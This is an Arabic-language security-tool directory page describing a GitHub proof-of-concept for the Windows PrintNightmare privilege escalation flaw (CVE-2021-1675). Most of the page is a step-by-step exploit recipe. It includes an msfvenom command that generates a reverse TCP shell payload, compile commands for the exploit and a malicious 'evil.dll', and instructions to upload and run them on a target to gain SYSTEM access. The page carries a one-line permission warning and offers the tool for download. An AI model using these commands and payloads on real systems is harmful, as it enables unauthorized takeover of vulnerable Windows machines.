Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-1675 — استغلال تصعيد الامتيازات المحلية لثغرة CVE-2021-1675 (PrintNightmare) الذي يقوم بتثبيت ملف DLL خبيث للحصول على وصول بنظام SYSTEM على أنظمة ويندوز الضعيفة. | Kitploit
أدوات/GitHubGitHub/andrewtrube/cve-2021-1675
تصعيد الامتيازاتأطر الاستغلالالاستغلالاختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubandrewtrube/cve-2021-1675

CVE-2021-1675

استغلال تصعيد الامتيازات المحلية لثغرة CVE-2021-1675 (PrintNightmare) الذي يقوم بتثبيت ملف DLL خبيث للحصول على وصول بنظام SYSTEM على أنظمة ويندوز الضعيفة.

عرض المستودع
51منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم لتصعيد الامتيازات المحلية عبر PrintNightmare

src/nightmare.cpp: الكود المصدري لاستغلال CVE-2021-1675 والحصول على وصول النظام عن طريق تثبيت ملف dll خبيث src/payload-dll.cpp: الكود المصدري لملف dll يحتوي على شيل كود خبيث في دالة الإدخال

!!استخدم فقط ضد الخوادم التي لديك إذن لاختبارها

ملخص

CVE-2021-1675 هي ثغرة أمنية في خدمة Print Spooler في نظام Microsoft Windows والتي تسمح للمهاجم بتجاوز فحص SeLoadDriverPrivilege. يمكن استغلال ذلك لتحقيق تصعيد الامتيازات على الجهاز المستهدف عن طريق تثبيت ملف DLL خبيث يستدعي شيل كود أو يستخدم واجهة برمجة تطبيقات Windows لإنشاء اتصال شل عكسي. الإصدارات المتأثرة من Windows 10/8/Server 2008/Server 2012 قبل 8 يونيو 2021 متأثرة.

إثبات المفهوم

  1. قم بتنزيل أو استنساخ مستودع git
  2. استخدم msfvenom لإنشاء حمولة مناسبة بلغة c $ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f c
  3. الصق مخرجات msfvenom في payload-dll.cpp حيث يُشار إلى 'change me'
  4. قم بتجميع الملف التنفيذي الرئيسي x86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspool
  5. قم بتجميع ملف dll x86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -shared
  6. قم بأرشفة الملف التنفيذي وملف dll، ثم ابحث عن طريقة لرفع الأرشيف إلى جهازك المستهدف zip ./bin/PrinterNightmareLPE.exe ./lib/
  7. بمجرد وصول الأرشيف إلى جهاز Windows المستهدف، قم باستخراجه
  8. انقل evil.dll إلى c:\windows\temp\evil.dll
  9. قم بتشغيل PrintNightmareLPE.exe

ملاحظات

  • إذا كان كل شيء يعمل بشكل صحيح، يجب أن يتكرر الاستغلال عبر برامج تشغيل الطابعات في Windows ويعرض النتائج
  • يمكنك تغيير مسار الملف الذي يقوم PrintNightmareLPE.exe بتحميل evil.dll منه داخل الكود المصدري
  • حالياً، يقوم ملف dll الخبيث فقط بتحميل calc.exe كإثبات للمفهوم
تنزيل الأداة